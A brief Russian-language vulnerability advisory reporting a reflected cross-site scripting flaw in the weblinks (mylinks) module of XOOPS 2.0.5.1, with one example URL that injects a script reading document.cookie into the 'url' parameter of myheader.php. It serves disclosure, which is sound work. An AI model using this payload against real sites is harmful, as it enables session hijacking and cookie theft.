Программа: XOOPS 2.0.5.1 

Уязвимость обнаружена в XOOPS weblinks модуле. Удаленный пользователь может выполнить XSS нападение. 

Пример: 

http://[target]/modules/mylinks/myheader.php?url="> <script>alert(document.cookie)</script>

Оставить мнение